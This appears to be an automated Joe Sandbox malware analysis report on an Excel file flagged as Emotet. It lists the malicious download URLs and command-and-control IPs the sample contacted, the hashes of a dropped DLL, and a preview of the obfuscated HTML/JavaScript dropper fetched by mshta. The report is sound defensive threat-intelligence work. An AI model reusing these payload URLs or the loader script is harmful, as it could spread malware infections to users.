                            http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3100%Avira URL Cloudmalware
                            https://160.16.102.168:80/gYIhzp0%Avira URL Cloudsafe
                            http://91.240.118.168/vvv/ppp/fe.png100%Avira URL Cloudmalware
                            http://91.20%Avira URL Cloudsafe
                            http://test.dreamcityorlando.com100%Avira URL Cloudmalware
                            http://crm.compracasaenhouston.c0%Avira URL Cloudsafe
                            http://91.240.118.168/vvv/ppp/fe.htmlC:100%Avira URL Cloudmalware
                            http://curvygirlsboutique.com/jf100%Avira URL Cloudmalware
                            http://91.240.118.168/vvv/ppp/fe.html3100%Avira URL Cloudmalware
                            http://test.vale0%Avira URL Cloudsafe
                            http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3100%Avira URL Cloudmalware
                            http://crm.compr0%Avira URL Cloudsafe
                            http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3100%Avira URL Cloudphishing
                            http://lynsmithgroup.com/hftm2i20%Avira URL Cloudsafe
                            http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/100%Avira URL Cloudmalware
                            http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html100%Avira URL Cloudmalware
                            http://crm.compracasaenhouston.com/hs4d8a/c0s13I/100%Avira URL Cloudphishing
                            http://www.protware.com0%URL Reputationsafe
                            http://91.240.118.168100%URL Reputationmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ayoobeducationaltrust.in
                            		139.59.58.214
                            		truetrueunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/vvv/ppp/fe.pngtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/vvv/ppp/fe.htmltrue
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://91.240.118.168/vvv/ppp/fe.htmlWinSta0mshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/vvv/ppp/fepowershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://cmit.valestudios.com/wp-admin/RueGJ41A/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • 13%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://sellin.appowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://91.240.118.168/vvv/ppp/fe.htmlv1.0mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://test.dreapowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://bawelnianka.cfolks.pl/wp-content/Ttv/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://91.240.11powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		low
                              http://ayoobeducationaltrust.inpowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              https://160.16.102.168:80/gYIhzpBrundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://huculek.fpowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://160.16.102.168:80/gYIhzpArundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.168/vvv/ppp/fe.pngPE3powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://cmit.valestudios.com/wp-apowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/vvv/ppp/fe.htmlmshtamshta.exe, 00000004.00000002.448869103.00000000004E0000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://test.valestudios.com/wp-cpowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.protware.com/mshta.exe, 00000004.00000003.424245582.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449466418.0000000003EAB000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424110567.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424721967.0000000003407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.444232743.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449284684.000000000340B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.449350682.000000000346D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425017595.0000000003408000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://thesocialagent.net/b/MO5AKqJ9Ty9lE/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://160.16.102.168:80/gYIhzprundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.2364453688149503140239183.xls.0.drtrue
                              • Avira URL Cloud: safe
                              		low
                              http://test.dreamcityorlando.compowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://crm.compracasaenhouston.cpowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://91.240.118.168/vvv/ppp/fe.htmlC:mshta.exe, 00000004.00000002.448978311.0000000000598000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424658641.0000000000578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447450916.0000000000597000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://curvygirlsboutique.com/jfpowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/vvv/ppp/fe.html3mshta.exe, 00000004.00000003.447334668.0000000000536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447356395.000000000053E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448911645.0000000000542000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://test.valepowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://crm.comprpowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://lynsmithgroup.com/hftm2i2powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.htmlmshta.exe, 00000004.00000003.426086113.0000000003205000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://crm.compracasaenhouston.com/hs4d8a/c0s13I/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  https://160.16.102.168:80/gYIhzpzrundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://sellin.app/wp-admin/S2cDPYXNKEnT/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://test.dreamcityorlando.com/t0mmx/xBBXi/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        http://www.protware.commshta.exe, 00000004.00000003.424599420.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424268800.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447384053.00000000033C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://sellin.app/wp-admin/S2cDPpowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://cmit.valestudios.com/wp-admin/RueGJ41A/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            https://160.16.102.168:80/gYIhzpKrundll32.exe, 00000011.00000002.679244747.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://cmit.valepowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://160.16.102.168:80/gYIhzpHrundll32.exe, 00000011.00000002.679438448.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://91.240.118.168/vvv/ppp/fe.html17mshta.exe, 00000004.00000003.447483240.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448998828.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424683366.00000000005B1000.00000004.00000020.00020000.00000000.sdmptrue
                                                      		unknown
                                                      http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://91.240.118.168powershell.exe, 00000006.00000002.685495264.000000000360E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.679285787.00000000000B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://thesocialagent.net/b/MO5Apowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://ayoobeducationaltrust.in/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                                                		unknown
                                                                http://bawelnianka.cfolks.pl/wp-powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://huculek.futurehost.pl/imapowershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://test.dreamcityorlando.com/t0mmx/xBBXi/PE3powershell.exe, 00000006.00000002.685627129.0000000003765000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        		unknown
                                                                        http://91.240.118.168/vvv/ppp/fe.htmlfunctionmshta.exe, 00000004.00000003.426307315.000000000320D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          195.154.133.20
                                                                          		unknownFrance
                                                                          		12876OnlineSASFRtrue
                                                                          185.157.82.211
                                                                          		unknownPoland
                                                                          		42927S-NET-ASPLtrue
                                                                          212.237.17.99
                                                                          		unknownItaly
                                                                          		31034ARUBA-ASNITtrue
                                                                          79.172.212.216
                                                                          		unknownHungary
                                                                          		61998SZERVERPLEXHUtrue
                                                                          110.232.117.186
                                                                          		unknownAustralia
                                                                          		56038RACKCORP-APRackCorpAUtrue
                                                                          173.214.173.220
                                                                          		unknownUnited States
                                                                          		19318IS-AS-1UStrue
                                                                          212.24.98.99
                                                                          		unknownLithuania
                                                                          		62282RACKRAYUABRakrejusLTtrue
                                                                          138.185.72.26
                                                                          		unknownBrazil
                                                                          		264343EmpasoftLtdaMeBRtrue
                                                                          178.63.25.185
                                                                          		unknownGermany
                                                                          		24940HETZNER-ASDEtrue
                                                                          160.16.102.168
                                                                          		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                          81.0.236.90
                                                                          		unknownCzech Republic
                                                                          		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                          103.75.201.2
                                                                          		unknownThailand
                                                                          		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                          216.158.226.206
                                                                          		unknownUnited States
                                                                          		19318IS-AS-1UStrue
                                                                          45.118.115.99
                                                                          		unknownIndonesia
                                                                          		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                                                          51.15.4.22
                                                                          		unknownFrance
                                                                          		12876OnlineSASFRtrue
                                                                          159.89.230.105
                                                                          		unknownUnited States
                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                          162.214.50.39
                                                                          		unknownUnited States
                                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                                          91.240.118.168
                                                                          		unknownunknown
                                                                          		49453GLOBALLAYERNLtrue
                                                                          200.17.134.35
                                                                          		unknownBrazil
                                                                          		1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                                                                          217.182.143.207
                                                                          		unknownFrance
                                                                          		16276OVHFRtrue
                                                                          107.182.225.142
                                                                          		unknownUnited States
                                                                          		32780HOSTINGSERVICES-INCUStrue
                                                                          51.38.71.0
                                                                          		unknownFrance
                                                                          		16276OVHFRtrue
                                                                          45.118.135.203
                                                                          		unknownJapan63949LINODE-APLinodeLLCUStrue
                                                                          50.116.54.215
                                                                          		unknownUnited States
                                                                          		63949LINODE-APLinodeLLCUStrue
                                                                          139.59.58.214
                                                                          		ayoobeducationaltrust.inSingapore
                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                          131.100.24.231
                                                                          		unknownBrazil
                                                                          		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                                                          46.55.222.11
                                                                          		unknownBulgaria
                                                                          		34841BALCHIKNETBGtrue
                                                                          41.76.108.46
                                                                          		unknownSouth Africa
                                                                          		327979DIAMATRIXZAtrue
                                                                          173.212.193.249
                                                                          		unknownGermany
                                                                          		51167CONTABODEtrue
                                                                          45.176.232.124
                                                                          		unknownColombia
                                                                          		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                                          178.79.147.66
                                                                          		unknownUnited Kingdom
                                                                          		63949LINODE-APLinodeLLCUStrue
                                                                          212.237.5.209
                                                                          		unknownItaly
                                                                          		31034ARUBA-ASNITtrue
                                                                          162.243.175.63
                                                                          		unknownUnited States
                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                          176.104.106.96
                                                                          		unknownSerbia
                                                                          		198371NINETRStrue
                                                                          207.38.84.195
                                                                          		unknownUnited States
                                                                          		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                          164.68.99.3
                                                                          		unknownGermany
                                                                          		51167CONTABODEtrue
                                                                          192.254.71.210
                                                                          		unknownUnited States
                                                                          		64235BIGBRAINUStrue
                                                                          212.237.56.116
                                                                          		unknownItaly
                                                                          		31034ARUBA-ASNITtrue
                                                                          104.168.155.129
                                                                          		unknownUnited States
                                                                          		54290HOSTWINDSUStrue
                                                                          45.142.114.231
                                                                          		unknownGermany
                                                                          		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                                          203.114.109.124
                                                                          		unknownThailand
                                                                          		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                                                          209.59.138.75
                                                                          		unknownUnited States
                                                                          		32244LIQUIDWEBUStrue
                                                                          159.8.59.82
                                                                          		unknownUnited States
                                                                          		36351SOFTLAYERUStrue
                                                                          129.232.188.93
                                                                          		unknownSouth Africa
                                                                          		37153xneeloZAtrue
                                                                          58.227.42.236
                                                                          		unknownKorea Republic of
                                                                          		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                          158.69.222.101
                                                                          		unknownCanada
                                                                          		16276OVHFRtrue
                                                                          104.251.214.46
                                                                          		unknownUnited States
                                                                          		54540INCERO-HVVCUStrue

                                                                          General Information

                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                          Analysis ID:562430
                                                                          Start date:28.01.2022
                                                                          Start time:21:29:03
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 13m 34s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:light
                                                                          Sample file name:364453688149503140239183.xls
                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:18
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • HDC enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.expl.evad.winXLS@25/9@1/47
                                                                          EGA Information:
                                                                          • Successful, ratio: 75%
                                                                          HDC Information:
                                                                          • Successful, ratio: 21.1% (good quality ratio 18.4%)
                                                                          • Quality average: 67.6%
                                                                          • Quality standard deviation: 31.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Adjust boot time
                                                                          • Enable AMSI
                                                                          • Found application associated with file extension: .xls
                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                          • Attach to Office via COM
                                                                          • Scroll down
                                                                          • Close Viewer

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                          • TCP Packets have been reduced to 100
                                                                          • Excluded IPs from analysis (whitelisted): 92.123.101.235, 84.53.177.19
                                                                          • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                                                          • Execution Graph export aborted for target mshta.exe, PID 2840 because there are no executed function
                                                                          • Execution Graph export aborted for target powershell.exe, PID 3004 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          21:29:23API Interceptor54x Sleep call for process: mshta.exe modified
                                                                          21:29:28API Interceptor438x Sleep call for process: powershell.exe modified
                                                                          21:29:47API Interceptor147x Sleep call for process: rundll32.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          No context

                                                                          Domains

                                                                          No context

                                                                          ASNs

                                                                          No context

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\ProgramData\QWER.dll

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):548864
                                                                          Entropy (8bit):6.9805281108446335
                                                                          Encrypted:false
                                                                          SSDEEP:12288:B2AavzUBPSczbeeTLjvGyMwWd3DYr6i64/:OUBPSczbeeTnv6ZDWA
                                                                          MD5:29389EBE59F75F143BC38D8932E06808
                                                                          SHA1:D5370F203FD1A34F4B4A5AAE58C2EEE0B39F864B
                                                                          SHA-256:AB46128507884F34AA46ADEDB1266B5D3DCD09EB39D657E3FAE7A97B870B8350
                                                                          SHA-512:CC9645B935093040758099B9B8E0C201B35D4CA2638E3BC0B71E03412F16259583E32E1559E123B64D9FB72C1A795CDE26022927756BCC4943718CC336316408
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                                                          Download File
                                                                          Process:C:\Windows\System32\mshta.exe
                                                                          File Type:data
                                                                          Category:downloaded
                                                                          Size (bytes):10938
                                                                          Entropy (8bit):6.175530209677761
                                                                          Encrypted:false
                                                                          SSDEEP:192:aYheCkQRsqy+PVnH7GZ6oK3i8jcTWaIpWOOKesH5n8rM5eZoE2dwIUuaQkPNKtXi:aYdkexPZy9K3i0cTOdDewnTE2+Io1liS
                                                                          MD5:B44D97C843AE9C7EE5C2DFAEC0E71745
                                                                          SHA1:FE1DBDC7AE560D8062D4537E078D466D405EA5C5
                                                                          SHA-256:45F1EB0D5B17B378AC2F50D05E1B29D4D8070791690E63C23C8AC720D4FD4C36
                                                                          SHA-512:91CF71B8C949A3580D49BBC9FD776853ACB561710B30F6D26D01F53031BECF7AFEC924736DD8DC810D10F90F97E6D0FB1985EE0ABA5D28BE4B194D2128ACFEDC
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          IE Cache URL:http://91.240.118.168/vvv/ppp/fe.html
                                                                          Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';r1L4h2W4JYYeJ=new Array();bWx6JIowwnOsh=new Array();bWx6JIowwnOsh[0]='e\106\113F%34%36C%31' ;r1L4h2W4JYYeJ[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.%.6.1}..2.%.2.0}

                                                                          C:\Users\user\AppData\Local\Temp\4B14.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                          Category:dropped
                                                                          Size (bytes):1536
                                                                          Entropy (8bit):1.1464700112623651
                                                                          Encrypted:false
                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                          MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                          SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                          SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                          SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\~DF61981CC6FBEE46E0.TMP

                                                                          Download File
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
